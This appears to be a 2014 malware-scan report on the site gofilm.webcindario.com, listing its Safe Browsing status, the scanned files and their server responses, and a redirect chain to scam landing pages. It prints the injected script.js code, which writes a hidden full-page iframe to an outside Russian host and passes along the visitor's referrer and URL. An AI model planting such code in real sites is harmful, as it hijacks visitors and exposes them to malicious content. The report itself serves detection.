Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gofilm.webcindario.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gofilm.webcindario.com/ | 200 OK Content-Length: 6605 Content-Type: text/html | clean |
http://gofilm.webcindario.com/lock.js | 200 OK Content-Length: 1854 Content-Type: application/x-javascript | clean |
http://gofilm.webcindario.com/script.js | 200 OK Content-Length: 300 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe width="100%" height="4000" frameborder="0" framespacing="0" scrolling="no" src="http://bezsvyazi.ru/in.cgi?19&seoref='+encodeURIComponent(document.referrer)+'&parameter=$keyword&se=$se&ur=1&HTTP_REFERER='+encodeURIComponent(document.URL)+'&default_keyword=смотреть фильм">');
Antivirus reports:
http://probnic.info/zapaseng/popuptraf_new.js | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Sep 2014 04:52:54 GMT Location: http://r.meendocash.com/lr.php?rid=42c00128b0d12b6b Server: Apache/2.2.15 (CentOS) Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 | clean |
http://r.meendocash.com/lr.php?rid=42c00128b0d12b6b | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 29 Sep 2014 04:52:32 GMT Location: http://landing.meendo.com/badmarriage3/index.en_us.181.php?t=1411966352.4221&th=b2c4bb7567&rid=42c00128b0d12b6b&partner=1243&sub_id=4 Server: nginx/1.2.4 Content-Type: text/html X-Powered-By: PHP/5.3.17 | clean |
http://landing.meendo.com/badmarriage3/index.en_us.181.php?t=1411966352.4221&th=b2c4bb7567&rid=42c00128b0d12b6b&partner=1243&sub_id=4 | 200 OK Content-Length: 7731 Content-Type: text/html | clean |
http://landing.meendo.com/badmarriage3/ | 200 OK Content-Length: 8325 Content-Type: text/html | clean |
http://landing.meendo.com/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://hosting.miarroba.info/?__muid=5369c2a4b26581867646f4d253c5cde105bc7513&h=1481538&t=1411966350&k=8c7c452175ac2252d14450a21bda415f | 200 OK Content-Length: 90 Content-Type: application/x-javascript | clean |
http://contadores.miarroba.es/ver.php?id=324766 | 200 OK Content-Length: 11129 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gofilm.webcindario.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Sep 2014 04:52:30 GMT
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: __muid=5369c2a4b26581867646f4d253c5cde105bc7513; Domain=.webcindario.com; Path=/; Expires=Tue, 19 Jan 2038 03:14:11 GMT; HttpOnly
X-Powered-By: Webcindario Hosting Service
Second query (visit from search engine):
GET / HTTP/1.1
Host: gofilm.webcindario.com
Referer: http://www.google.com/search?q=gofilm.webcindario.com
Result:
The result is similar to the first query. There are no suspicious redirects found.